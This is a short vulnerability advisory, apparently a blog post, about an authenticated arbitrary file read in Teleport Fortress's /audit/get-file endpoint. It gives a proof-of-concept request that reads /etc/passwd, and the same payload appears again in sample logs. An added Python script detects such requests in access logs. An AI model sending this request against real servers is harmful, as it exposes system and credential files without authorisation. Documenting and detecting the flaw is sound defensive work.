Teleport Fortress Get File Background Arbitrary File Reading Vulnerability
Vulnerability Description
The get-file interface of Teleport Fortress has an arbitrary file read vulnerability in the backend. After gaining backend access through the arbitrary user login vulnerability, an attacker can use this arbitrary file read to obtain sensitive files on the server.
Vulnerability Impact
Teleport Version <= 20220817
Network surveying and mapping
Vulnerability Reproduction
Login page
After logging in, verify with the PoC:
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
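A log check for the request shown above, as an added example (not part of the original post and not Teleport code): it scans web access log lines for /audit/get-file requests whose f parameter is an absolute path or contains a ".." segment. The combined log format, the assumption that a legitimate f value is a relative file name, and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated URL-encoding so the check sees the final path."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_f(value):
    """Return a reason if f is not a plain relative file name (assumed norm)."""
    path = decode_fully(value).replace("\\", "/")
    if path.startswith("/") or re.match(r"^[A-Za-z]:/", path):
        return "absolute path"
    if ".." in path.split("/"):
        return "parent-directory segment"
    return None

def scan(lines):
    """Yield (line_number, f_value, reason) for flagged /audit/get-file requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.rstrip("/") != "/audit/get-file":
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("f", []):
            reason = suspicious_f(value)
            if reason:
                yield number, decode_fully(value), reason

# Constructed sample log lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2022:10:00:01 +0000] "GET /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0 HTTP/1.1" 200 1532',
    '192.0.2.10 - - [01/Sep/2022:10:00:05 +0000] "GET /audit/get-file?f=%252Fetc%252Fpasswd&rid=1&type=rdp&act=read&offset=0 HTTP/1.1" 200 1532',
    '198.51.100.7 - - [01/Sep/2022:10:02:00 +0000] "GET /audit/get-file?f=sample-record.dat&rid=1&type=rdp&act=read&offset=0 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Sep/2022:10:03:00 +0000] "GET /dashboard HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Flagged lines should be correlated with the login events for the same session, since the request is only reachable after authentication.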
This post is licensed under CC BY 4.0 by the author.